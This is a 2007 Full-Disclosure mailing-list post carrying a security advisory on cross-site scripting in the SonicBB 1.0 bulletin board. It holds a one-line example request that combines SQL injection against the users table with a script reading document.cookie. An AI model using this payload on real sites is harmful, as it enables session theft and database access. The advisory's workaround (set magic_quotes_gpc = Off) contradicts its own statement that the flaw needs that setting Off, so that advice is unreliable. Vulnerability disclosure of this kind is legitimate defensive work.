[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] SonicBB version 1.0 XSS Attack Vulnerabilities
From:       "SecurityResearch" <securityresearch () netvigilance ! com>
Date:       2007-05-14 12:32:27
Message-ID: 012FDE7DE21D97498794A72AEEF90D7F06A521 () beaverton ! portland ! local
[Download RAW message or body]

netVigilance Security Advisory #20
SonicBB version 1.0 XSS Attack Vulnerabilities 
Description:
SonicBB is a user-friendly and fully customizable bulletin board package. SonicBB is \
compatible with any web server/operating system combo with PHP 4.x or higher \
installed.SonicBB is the ideal community software for all sites. This vulnerabilities \
can be exploited only when PHP magic_quotes_gpc = Off. External References: 
Mitre CVE:  CVE-2007-1903
NVD NIST: CVE-2007-1903
OSVDB: 34042
Summary: 
SonicBB is a user-friendly and fully customizable bulletin board package. SonicBB is \
compatible with any web server/operating system combo with PHP 4.x or higher \
installed. SonicBB is the ideal community software for all sites.   Security problem \
in the product allows attackers to commit XSS attacks. Advisory URL: 
http://www.netvigilance.com/advisory0020
Release Date:
05/14/2007 
Severity:
Risk: Medium
 
CVSS Metrics
Access Vector: Remote
Access Complexity: High
Authentication: Not-required
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
Impact Bias: Normal
CVSS Base Score: 5.6
 
Target Distribution on Internet: Low
 
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Confirmed
 
Vulnerability Impact: Attack
Host Impact: XSS Attack.
SecureScout Testcase ID:
TC 17944
Vulnerable Systems:
SonicBB version 1.0
Vulnerability Type:
XSS (Cross-Site Scripting) to force a web-site to display malicious contents to the \
target, by sending a specially crafted request to the web-site. The vulnerable \
web-site is not the target of attack but is used as a tool for the hacker in the \
attack of the victim. Vendor:
iScripts
Vendor Status: 
Contact with the Vendor was established and draft of the security advisory was \
provided on 10 April  2007, the vendor promised to fix the issue but stopped \
responding to our emails on 10 April  2007. There is no official fix at the release \
of this Security Advisory  Workaround:
Modify in the php.ini file following line: magic_quotes_gpc = Off.
Example: 
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/search.php?query=1&part=post`<> '' UNION SELECT \
`id`,'<script>alert(document.cookie)</script>',1,1,1,1,`username` FROM `users` WHERE \
id=1%23 REPLY:
Will execute <script>alert(document.cookie)</script>
Credits: 
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.c

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic